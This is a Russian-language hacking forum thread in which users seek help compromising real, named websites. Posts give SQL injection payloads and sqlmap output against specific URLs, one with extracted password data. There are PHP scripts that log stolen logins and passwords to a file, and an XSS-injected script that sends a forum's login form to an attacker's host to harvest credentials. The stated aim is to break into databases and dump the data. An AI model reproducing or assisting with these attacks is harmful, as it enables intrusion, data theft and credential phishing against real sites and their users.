Ваши вопросы по уязвимостям.

зависит от того, что вы хотите сделать.

 

Залезть в базу и слить данные.

Все способы, которые можно было - я перепробовал.

 

Вы что то с запросом сделать пытаетесь или это у вас просто страничка с ошибкой? ссылочку бы показали

 

linea='

linea=\' UNION SELECT version(); #

Может быть.

 

Code:

клад3.биз/?district_id=-31 раскрутить поможешь?

ссылка ушла в личку.

 

Havj не инжектить . Пробовал раскручивать,выдаёт ту же самую ссылку .
Вот собственно сама ссылочка metravib.acoemgroup.com/application.php?id=3&idm=20&ida=34 1
Blind Injection .

MYSQL Injection . Ссылка : www.muziekcentrum.be/carrier.php?id=8333 .

Как это раскрутить ? Помогите .

error'овые,не?

 

Помогите пжл,как сохранять запрос

Code:

$fd = fopen($file,"a");
…
fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);
…
fclose($fd);
…

 

код верный, что у вас не выходит?

 

А куда он должен сохранять логин и пасс?

 

В $file, имя которого ты указываешь сам.

 

Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini

 

Reverse IP не помогает?

 

итак, ищем в гугле "IIRF.ini"
в первых 6 результатах видим:

вывод - IIS. ищем "iis configuration file"
находим: http://stackoverflow.com/questions/8635884/iis7-settings-file-locations

 

К сожалению там нету такого файла, там одни только .dll файлы

 

Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость
Place: GET
Parameter: SL
Type: boolean-based blind
Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses
Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Type: AND/OR time-based blind
Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)
Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(97)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)

Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:
\x1c\x1f\x17\x18\x0ev\x1fjt\x15}

Притом это не на одном сайте, а на всех сайтах этой платформы.

Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!

UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:
157E02680F7F
1B0C130E197B620B7316
131E091001
171E0A0B057F620C7E12
00051D00087D6B087F17
171D1C0D0B676A08711D
0A00011F0A076F0F07600B0A

Что это за хеши такие? Oracle(DES)? или...? есть идеи?

PS можно платно

 

Почему у меня ничего не записывает php?
------------------------------------------------------------------------------------------------------------
<?
var $url = "";

$ls_username = $_POST['ls_username'];
$ls_password = $_POST['ls_password'];

if($('ls_username').value == '' || $('ls_password').value == '') {

$data = "E-mail: $ls_username \n PAss: $ls_password";
$filename = "base.txt";
$fd = fopen( $filename, "w+" );
fputs( $fd, $data );
fclose( $fd );
}

header("location: $url");
?>
------------------------------------------------------------------------------------------------------------
Вставляю этот скрипт
------------------------------------------------------------------------------------------------------------
<script>document.lsform.action=‘http://hosting.ru/base.php’</script>
------------------------------------------------------------------------------------------------------------
в страницу где форма
------------------------------------------------------------------------------------------------------------
<form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes" onsubmit="return lsSubmit();">
------------------------------------------------------------------------------------------------------------
И ничего не происходит,в чем может быть проблема?

 

Code:

$url = "";
$ls_username = $_POST['ls_username'];
$ls_password = $_POST['ls_password'];

if ($ls_username != null){
  if  ($ls_password != null) {
  $open=fopen('base.txt',"a");
  fwrite($open,"$ls_username;$ls_password\n");
  fclose($open);  
  }
}

 

Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?

 

Нет инъекции. Только ошибка.

 

Почему когда вставляю код (
<script>document.getElementById('lsform').action="http://МойХостинг1.ru/base.php?";</script>)
на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php) и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php?") Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?